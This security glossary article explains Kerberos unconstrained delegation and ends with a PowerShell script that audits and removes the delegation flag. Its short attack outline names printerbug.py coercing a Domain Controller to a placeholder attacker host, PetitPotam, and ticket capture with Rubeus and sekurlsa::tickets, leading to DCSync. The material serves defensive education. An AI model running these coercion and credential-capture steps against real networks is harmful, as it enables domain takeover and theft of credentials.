Active Directory · Term

What is unconstrained delegation?

Unconstrained delegation lets a server capture the full Kerberos ticket of anyone who connects to it, then reuse it anywhere. Coerce a Domain Controller to connect and the attacker owns the domain. Here is what it is and how to remove it.

TL;DR

Unconstrained delegation is a Kerberos setting (the TRUSTED_FOR_DELEGATION flag) that lets a server capture the full TGT of any user who authenticates to it and reuse that ticket to impersonate them anywhere. If an attacker controls such a server, they can coerce a Domain Controller to authenticate to it, capture the DC’s ticket, and take over the domain. It is the most dangerous delegation type, and it should exist on nothing but Domain Controllers.

By John Dill, Red Team Lead, SecureLayer7

What unconstrained delegation is

When a computer is trusted for unconstrained delegation, any user who authenticates to it sends along a copy of their TGT, which the server caches. That lets the server act as that user toward *any* service, with no restriction, hence "unconstrained."

This was an early Kerberos feature for multi-tier applications, but it is extremely dangerous: a server with this setting that an attacker controls becomes a trap that collects the master credentials of everyone who connects.

The abuse and payload

The classic attack pairs unconstrained delegation with a coercion trick:

1. Compromise a host trusted for unconstrained delegation (or find one already under attacker control).
2. Coerce a high-value target, ideally a Domain Controller, to authenticate to it: printerbug.py corp.local/user@dc-ip <attacker-host> or PetitPotam.
3. Capture the incoming TGT from memory: Rubeus.exe monitor or sekurlsa::tickets.
4. Reuse the DC’s TGT (Pass-the-Ticket) to run DCSync and take the domain.

Documented techniques shown for defensive awareness.

How to defend

  • Remove unconstrained delegation from every server that is not a Domain Controller; use constrained or resource-based delegation if delegation is genuinely needed.
  • Mark privileged accounts "sensitive and cannot be delegated" (or add them to Protected Users) so their TGT is never forwarded.
  • Mitigate coercion vectors (PrinterBug, PetitPotam) and restrict who can reach delegation hosts.
  • Monitor for coercion attempts and for TGTs being captured.
  • Enumerate regularly with BloodHound, which flags unconstrained delegation.
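The following PowerShell is an added example, not code from the SecureLayer7 page, that puts the definition above (the TRUSTED_FOR_DELEGATION bit in userAccountControl) and the first two defence items into an auditable script. It assumes the RSAT ActiveDirectory module is installed, that the caller can read and modify computer and user objects, and that the only hosts allowed to keep the flag are the Domain Controllers; the variable names and the use of adminCount=1 as the set of "privileged accounts" are this example's choices, not the page's.

```powershell
# Added example (not from the original page): audit and remediate
# unconstrained delegation with the RSAT ActiveDirectory module.
# Assumes the module is installed and the caller has rights to read and
# modify computer and user objects in the current domain.
Import-Module ActiveDirectory

# userAccountControl bit values (documented by Microsoft)
$TRUSTED_FOR_DELEGATION = 0x80000   # 524288: unconstrained delegation
$NOT_DELEGATED          = 0x100000  # 1048576: "sensitive and cannot be delegated"

# LDAP bitwise-AND matching rule, so the filter is evaluated server-side
$BitAnd = '1.2.840.113556.1.4.803'

# 1. Domain Controllers legitimately carry the flag: build the allow-list.
$dcDns = (Get-ADDomainController -Filter *).ComputerObjectDN

# 2. Find every computer AND every user/service account with the flag set.
$flaggedComputers = Get-ADComputer `
    -LDAPFilter "(userAccountControl:$BitAnd:=$TRUSTED_FOR_DELEGATION)" `
    -Properties OperatingSystem, LastLogonDate
$flaggedUsers = Get-ADUser `
    -LDAPFilter "(userAccountControl:$BitAnd:=$TRUSTED_FOR_DELEGATION)" `
    -Properties LastLogonDate, ServicePrincipalName

# Anything that is not a DC should not have unconstrained delegation.
$rogueComputers = $flaggedComputers | Where-Object { $dcDns -notcontains $_.DistinguishedName }

Write-Host "Non-DC computers trusted for unconstrained delegation:"
$rogueComputers | Select-Object Name, OperatingSystem, LastLogonDate | Format-Table -AutoSize
Write-Host "User/service accounts trusted for unconstrained delegation:"
$flaggedUsers | Select-Object SamAccountName, LastLogonDate, ServicePrincipalName | Format-Table -AutoSize

# 3. Remediate: clear the flag everywhere except on DCs. -WhatIf previews the
#    change; remove it once each host has been reviewed (an application that
#    genuinely needs delegation should be moved to constrained or RBCD instead).
foreach ($c in $rogueComputers) {
    Set-ADComputer -Identity $c -TrustedForDelegation $false -WhatIf
}
foreach ($u in $flaggedUsers) {
    Set-ADAccountControl -Identity $u -TrustedForDelegation $false -WhatIf
}

# 4. Defence in depth: make privileged accounts non-delegable so their TGT is
#    never forwarded even if a rogue host is missed. adminCount=1 (accounts
#    covered by AdminSDHolder) is used here as the definition of "privileged".
$privilegedNotProtected = Get-ADUser `
    -LDAPFilter "(&(adminCount=1)(!(userAccountControl:$BitAnd:=$NOT_DELEGATED)))"
foreach ($u in $privilegedNotProtected) {
    Set-ADAccountControl -Identity $u -AccountNotDelegated $true -WhatIf
}

# Protected Users membership gives the same guarantee (plus others such as no
# NTLM and no long-lived TGTs). Review break-glass accounts before adding them:
# Add-ADGroupMember -Identity 'Protected Users' -Members $privilegedNotProtected -WhatIf
```

Run it with the `-WhatIf` switches in place first; the two reports it prints are the items BloodHound would also flag, and an empty first table (only DCs carry the flag) is the state to aim for. The filters use the LDAP bitwise-AND rule rather than `-Filter {TrustedForDelegation -eq $true}` so the same query can be reused directly against LDAP from other tooling.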
